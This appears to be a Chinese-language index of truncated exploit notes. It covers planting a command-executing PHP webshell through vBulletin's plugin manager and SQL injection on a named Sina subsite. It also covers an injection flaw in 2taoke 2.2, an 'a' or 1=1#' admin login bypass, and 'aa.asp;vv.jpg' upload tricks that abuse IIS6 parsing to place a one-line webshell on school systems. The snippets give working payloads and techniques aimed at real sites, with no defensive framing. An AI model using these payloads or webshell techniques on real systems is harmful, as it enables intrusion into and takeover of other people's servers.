-
vBulletin 论坛后台拿shell
在后台,进插件管理.添加插件. Ajax_complete 填入代码:if(isset($_GET['cmd'])){echo "<h1>cmd</h1><pre>"; syst...
-
sina某分站sql注射
简要描述:新浪某分站,对用户提交参数过滤不严格,导致注入漏洞详细说明: http://ikongzi.edu.sina.com/do/schools.php?f_id=8&a_id=2883http://ikongzi.edu.si...
-
2taoke 2.2 注入漏洞
function tao_check($string){ if(!is_array($string)) return addslashes(trim($string));...
-
冰山信息发布系统后台登陆漏洞
默认后台为 admin可直接利用 a' or 1=1# php万能密码进后台后台有上传 直接上传 1.asp;jpg...
-
多功能教室预约系统留言版漏洞
多功能教室预约系统大部分都是学校以及edu在使用guestbook留言本可以上传图片上传程序没有随上传日期而改文件名直接上传aa.asp;vv.jpg文件名 (IIS6.漏洞解析)发表留言后直接一句话连接jpg图片默认后台:http:///...
